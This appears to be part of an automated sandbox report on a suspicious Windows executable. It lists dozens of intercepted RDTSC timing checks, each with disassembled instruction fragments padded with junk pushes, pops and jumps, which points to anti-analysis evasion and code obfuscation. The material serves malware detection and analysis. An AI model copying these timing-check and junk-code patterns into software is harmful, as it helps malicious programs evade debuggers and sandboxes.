                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DD6D second address: C9DD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DD73 second address: C9DDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F345319F6h 0x0000000f jmp 00007F0F345319F5h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DDA8 second address: C9DDD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC150h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F0F34BEC14Ch 0x00000011 ja 00007F0F34BEC146h 0x00000017 js 00007F0F34BEC152h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DF04 second address: C9DF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E0AC second address: C9E0B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E0B1 second address: C9E0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F0F345319E6h 0x00000010 jmp 00007F0F345319EEh 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jo 00007F0F345319FCh 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E0DB second address: C9E0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnc 00007F0F34BEC146h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9EB45 second address: C9EB62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319F9h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9EB62 second address: C9EB6C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1649 second address: CA1666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0F345319F2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1666 second address: CA166A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA166A second address: CA166E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA166E second address: CA168D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC159h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3E5B second address: CA3E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1036 second address: CB1046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC14Ah 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1046 second address: CB104A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB104A second address: CB106C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F0F34BEC173h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F34BEC152h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBD96A second address: CBD96E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBFBDC second address: CBFBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6FC1 second address: BB6FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6FCD second address: BB6FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3C3A second address: CC3C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC576C second address: CC57CC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0F34BEC14Dh 0x00000010 jp 00007F0F34BEC146h 0x00000016 jmp 00007F0F34BEC155h 0x0000001b popad 0x0000001c push ebx 0x0000001d jmp 00007F0F34BEC152h 0x00000022 pop ebx 0x00000023 popad 0x00000024 pushad 0x00000025 jnc 00007F0F34BEC152h 0x0000002b push eax 0x0000002c push edx 0x0000002d push edx 0x0000002e pop edx 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0F81 second address: BC0F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319EBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD5D5 second address: CDD5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD5D9 second address: CDD5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007F0F345319E6h 0x0000000f je 00007F0F345319E6h 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDB6F second address: CDDB77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDB77 second address: CDDB7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDF8D second address: CDDF91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDF91 second address: CDDFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0F345319E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d je 00007F0F345319E6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop edi 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDFA7 second address: CDDFD5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F34BEC14Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c jmp 00007F0F34BEC156h 0x00000011 pop edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDFD5 second address: CDDFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE265 second address: CDE270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE3B9 second address: CDE3D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jns 00007F0F345319E6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F0F345319E8h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE3D3 second address: CDE3E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC14Fh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1024 second address: CE102B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE124D second address: CE1253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1371 second address: CE1375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1375 second address: CE13AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC151h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F0F34BEC155h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE13AD second address: CE13B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1628 second address: CE162E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE162E second address: CE1673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jg 00007F0F34531A00h 0x0000000d nop 0x0000000e mov dl, 4Ah 0x00000010 push dword ptr [ebp+122D26C2h] 0x00000016 sbb edx, 4D93AAF0h 0x0000001c call 00007F0F345319E9h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1673 second address: CE1679 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1679 second address: CE1690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0F345319E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1690 second address: CE16A5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F34BEC148h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3F7C second address: CE3F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5ED2 second address: CE5ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70D67 second address: 4C70D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70D6B second address: 4C70D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70D71 second address: 4C70DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0F345319F2h 0x00000008 pop eax 0x00000009 movsx edx, cx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0F345319EFh 0x00000019 sub esi, 3316762Eh 0x0000001f jmp 00007F0F345319F9h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F0F345319F0h 0x0000002b xor ecx, 7C7773A8h 0x00000031 jmp 00007F0F345319EBh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70DE5 second address: 4C70E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov di, 6516h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e movzx eax, dx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F0F34BEC155h 0x00000019 and ah, 00000076h 0x0000001c jmp 00007F0F34BEC151h 0x00000021 popfd 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E23 second address: 4C70E54 instructions: 0x00000000 rdtsc 0x00000002 mov bl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F0F345319F3h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F345319F0h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E54 second address: 4C70E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E5A second address: 4C70E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E60 second address: 4C70E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E64 second address: 4C70E68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E68 second address: 4C70E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F34BEC14Bh 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E7E second address: 4C70E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E84 second address: 4C70E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60CB3 second address: 4C60CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319ECh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60CC3 second address: 4C60CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60CC7 second address: 4C60CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F0F345319ECh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0B76 second address: 4CA0B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0B7C second address: 4CA0B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0B80 second address: 4CA0C0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ax, 861Bh 0x00000011 mov si, 68F7h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F0F34BEC153h 0x0000001e adc si, BD7Eh 0x00000023 jmp 00007F0F34BEC159h 0x00000028 popfd 0x00000029 mov esi, 4043FBC7h 0x0000002e popad 0x0000002f xchg eax, ebp 0x00000030 jmp 00007F0F34BEC14Ah 0x00000035 mov ebp, esp 0x00000037 jmp 00007F0F34BEC150h 0x0000003c pop ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F0F34BEC157h 0x00000044 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0C0E second address: 4CA0C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0C14 second address: 4CA0C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C400E7 second address: 4C40113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esp 0x00000007 jmp 00007F0F345319EAh 0x0000000c mov dword ptr [esp], ebp 0x0000000f jmp 00007F0F345319F0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40113 second address: 4C40119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40119 second address: 4C4011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4011F second address: 4C40123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40123 second address: 4C40143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 push dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movzx esi, dx 0x0000001d mov ch, dh 0x0000001f popad 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60A0B second address: 4C60A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60567 second address: 4C6058F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 4512E871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F0F345319ECh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F345319EEh 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6058F second address: 4C60595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60485 second address: 4C6048B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6048B second address: 4C6048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6048F second address: 4C60493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60493 second address: 4C604CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F0F34BEC154h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F34BEC157h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C604CC second address: 4C60507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F345319F8h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60507 second address: 4C6050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6050B second address: 4C60511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6029D second address: 4C602A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C602A3 second address: 4C602A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C602A9 second address: 4C602AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C602AD second address: 4C602CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F345319F5h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70078 second address: 4C700AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f call 00007F0F34BEC14Fh 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0ADE second address: 4CA0B1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 pushfd 0x00000006 jmp 00007F0F345319EAh 0x0000000b jmp 00007F0F345319F5h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F0F345319EEh 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0B1E second address: 4CA0B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0B22 second address: 4CA0B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0B26 second address: 4CA0B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
